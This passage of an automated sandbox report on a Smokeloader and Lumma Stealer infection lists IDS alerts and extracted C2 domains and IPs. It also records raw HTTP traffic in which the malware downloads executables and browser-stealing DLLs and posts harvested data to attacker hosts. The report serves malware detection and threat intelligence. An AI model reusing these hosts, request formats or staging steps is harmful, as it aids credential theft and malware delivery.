Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then jmp edx 5_2_02162D5B
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 5_2_0214CD77
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 4x nop then mov eax, dword ptr [esp+4Ch] 5_2_02155D61

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49711 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49719 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.5:58021 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49721 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49737 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49739 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49744 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49773 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49774 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49775 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49776 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49777 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49778 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49779 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49780 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49781 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49782 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49783 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49784 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49785 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49786 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49787 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49788 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49789 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49790 -> 186.112.12.192:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 187.143.58.5 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 186.112.12.192 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: boredimperissvieos.shop
Source: Malware configuration extractor URLs: holicisticscrarws.shop
Source: Malware configuration extractor URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor URLs: plaintediousidowsko.shop
Source: Malware configuration extractor URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor URLs: boredimperissvieos.shop
Source: Malware configuration extractor URLs: boredimperissvieos.shop
Source: Malware configuration extractor URLs: holicisticscrarws.shop
Source: Malware configuration extractor URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor URLs: plaintediousidowsko.shop
Source: Malware configuration extractor URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor URLs: boredimperissvieos.shop
Source: Malware configuration extractor URLs: holicisticscrarws.shop
Source: Malware configuration extractor URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor URLs: plaintediousidowsko.shop
Source: Malware configuration extractor URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor URLs: http://lobulraualov.in.net/tmp/index.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 22:27:21 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 22:20:02 GMTConnection: keep-aliveETag: "6653b592-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 22:27:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 22:23:46 GMTETag: "20ba00-61962daa50080"Accept-Ranges: bytesContent-Length: 2144768Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 66 09 00 00 50 17 00 00 00 00 00 60 75 09 00 00 10 00 00 00 80 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 21 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 09 00 3c 22 00 00 00 f0 0a 00 00 30 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0a 00 88 c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 c8 65 09 00 00 10 00 00 00 66 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 2e 00 00 00 80 09 00 00 30 00 00 00 6a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d5 10 00 00 00 b0 09 00 00 00 00 00 00 9a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 3c 22 00 00 00 d0 09 00 00 24 00 00 00 9a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 00 0a 00 00 00 00 00 00 be 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0a 00 00 02 00 00 00 be 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 88 c9 00 00 00 20 0a 00 00 ca 00 00 00 c0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 30 16 00 00 f0 0a 00 00 30 16 00 00 8a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 20 21 00 00 00 00 00 00 ba 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.145.40.124 23.145.40.124
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View ASN Name: UninetSAdeCVMX UninetSAdeCVMX
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20562Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5445Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1248Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568201Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGHJECFCFCBFIDBGCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 5897Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIJEBFCGDAAKFHIDBFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 112837Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbtdsjawscshri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gitrvlonrfqrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltjhtqaytuwkyt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rjjvubikquby.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctkjptrcxdnjtm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eisoaquivduh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbiuottwvhtdjd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eevetcrfdfleqxq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unanbdkiibq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: dbfhns.in
